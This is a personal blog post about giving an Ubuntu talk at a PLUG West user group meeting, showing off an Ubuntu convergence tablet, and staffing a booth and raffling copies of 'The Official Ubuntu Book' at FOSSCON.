Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I also was able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu.
Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.
Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.
Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long time LoCo member Randy Gold.
They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.

Thanks to Randy for the booth photo!
At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books.

My co-author, José Antonio Rey, signing a copy of our book!

5 days ago